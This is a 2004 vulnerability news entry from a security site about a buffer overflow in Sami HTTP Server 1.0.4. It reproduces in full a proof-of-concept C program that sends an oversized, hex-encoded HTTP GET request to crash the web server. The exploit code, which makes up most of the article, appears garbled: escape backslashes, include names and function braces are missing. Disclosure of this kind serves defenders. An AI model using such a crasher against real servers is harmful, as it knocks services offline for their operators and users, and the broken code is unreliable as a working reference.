Main Menu
Network
Sponsor
Top 10 Sites
Partners
|
|
Top Submit newsSubscribe 
Communication | Computer Crime | Digital Audio, Video, Photo | General News | Hardware | Internet | Mobile | PDA | Security | Software | Vulnerability |
Previous articleBack to news listNext article
| Sponsored links | Want to become one of our authors and see your work published on ALLSeek.iNFO ?
| | Sami HTTP Server Buffer Overflow Lets Remote Users Crash the Web Server |
|---|
Categorie: Vulnerability
Posted: 2004-02-18 by ReCall
Views: 396
Source: Click here
| Current Rating: Not rated
|
| | Details |
|---|
Description: badpack3t of SP Research Labs reported a buffer overflow in the Sami HTTP Server. A remote user can cause the web service to crash and may be able to execute arbitrary code.
It is reported that a remote user can send a specially crafted HTTP GET request containing more than 4096 bytes of data to the target server to cause the web service to crash.
The report indicates that it may be possible to cause the server to execute arbitrary code.
A demonstration exploit
/****************************/
PoC to crash the server
/****************************/
http://fux0r.phathookups.com/coding/c++/sp-samihttpddos.c
/* Sami HTTP Server Version 1.0.4
vendor:
http://karja.com
coded and discovered by:
badpack3t
for .:sp research labs:.
www.security-protocols.com
2.13.2004
usage:
sp-samihttpddos [targetport] (default is 80)
*/
#include
#include
#pragma comment(lib, "ws2_32.lib")
char exploit[] =
/* entire request */
"x47x45x54x20x2fx41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x01x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x2e"
"x68x74x6dx6cx20x48x54x54x50x2fx31x2ex31x0dx0ax52"
"x65x66x65x72x65x72x3ax20x68x74x74x70x3ax2fx2fx6c"
"x6fx63x61x6cx68x6fx73x74x2fx66x75x78x30x72x0dx0a"
"x43x6fx6ex74x65x6ex74x2dx54x79x70x65x3ax20x61x70"
"x70x6cx69x63x61x74x69x6fx6ex2fx78x2dx77x77x77x2d"
"x66x6fx72x6dx2dx75x72x6cx65x6ex63x6fx64x65x64x0d"
"x0ax43x6fx6ex6ex65x63x74x69x6fx6ex3ax20x4bx65x65"
"x70x2dx41x6cx69x76x65x0dx0ax55x73x65x72x2dx41x67"
"x65x6ex74x3ax20x4dx6fx7ax69x6cx6cx61x2fx34x2ex37"
"x36x20x5bx65x6ex5dx20x28x58x31x31x3bx20x55x3bx20"
"x4cx69x6ex75x78x20x32x2ex34x2ex32x2dx32x20x69x36"
"x38x36x29x0dx0ax56x61x72x69x61x62x6cx65x3ax20x72"
"x65x73x75x6cx74x0dx0ax48x6fx73x74x3ax20x6cx6fx63"
"x61x6cx68x6fx73x74x0dx0ax43x6fx6ex74x65x6ex74x2d"
"x6cx65x6ex67x74x68x3ax20x35x31x33x0dx0ax41x63x63"
"x65x70x74x3ax20x69x6dx61x67x65x2fx67x69x66x2cx20"
"x69x6dx61x67x65x2fx78x2dx78x62x69x74x6dx61x70x2c"
"x20x69x6dx61x67x65x2fx6ax70x65x67x2cx20x69x6dx61"
"x67x65x2fx70x6ax70x65x67x2cx20x69x6dx61x67x65x2f"
"x70x6ex67x0dx0ax41x63x63x65x70x74x2dx45x6ex63x6f"
"x64x69x6ex67x3ax20x67x7ax69x70x0dx0ax41x63x63x65"
"x70x74x2dx43x68x61x72x73x65x74x3ax20x69x73x6fx2d"
"x38x38x35x39x2dx31x2cx2ax2cx75x74x66x2dx38x0dx0a"
"x0dx0ax77x68x61x74x79x6fx75x74x79x70x65x64x3dx3f"
"x0dx0a";
int main(int argc, char *argv[])
WSADATA wsaData;
WORD wVersionRequested;
struct hostent *pTarget;
struct sockaddr_in sock;
char *target;
int port,bufsize;
SOCKET mysocket;
if (argc < 2)
{
printf("Sami HTTP Server Version 1.0.4 DoS by badpack3trn
om>rnrn", argv[0]);
printf("Usage:rn %s [targetport] (default is 80)rnrn", argv[0]);
printf("www.security-protocols.comrnrn", argv[0]);
exit(1);
}
wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;
target = argv[1];
port = 80;
if (argc >= 3) port = atoi(argv[2]);
bufsize = 1024;
if (argc >= 4) bufsize = atoi(argv[3]);
mysocket = socket(AF_INET, SOCK_STREAM, 0);
if(mysocket==INVALID_SOCKET)
{
printf("Socket error!rn");
exit(1);
}
printf("Resolving Hostnames...n");
if ((pTarget = gethostbyname(target)) == NULL)
{
printf("Resolve of %s failedn", argv[1]);
exit(1);
}
memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons((USHORT)port);
printf("Connecting...n");
if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))
{
printf("Couldn't connect to host.n");
exit(1);
}
printf("Connected!...n");
printf("Sending Payload...n");
if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1)
{
printf("Error Sending the Exploit Payloadrn");
closesocket(mysocket);
exit(1);
}
printf("Payload has been sent! Check if the webserver is dead y0!rn");
closesocket(mysocket);
WSACleanup();
return 0;
The original advisory is available at:
http://www.security-protocols.com/modules.php?name=News&file=article&sid=1746
Impact: A remote user can cause the web service to crash.
A remote user may be able to cause arbitrary code to be executed on the target system.
Solution: No solution was available at the time of this entry.
| | Syndication |
|---|
Permalink Email this
The URI to TrackBack this entry is:
http://allseek.info/news/trackback.php?id=727
| | User comments (post your comments ) |
|---|
Only registerd members can post comments and articles
|
| Previous articleBack to news listNext article
|
|
|
|
InterJOB.su
|
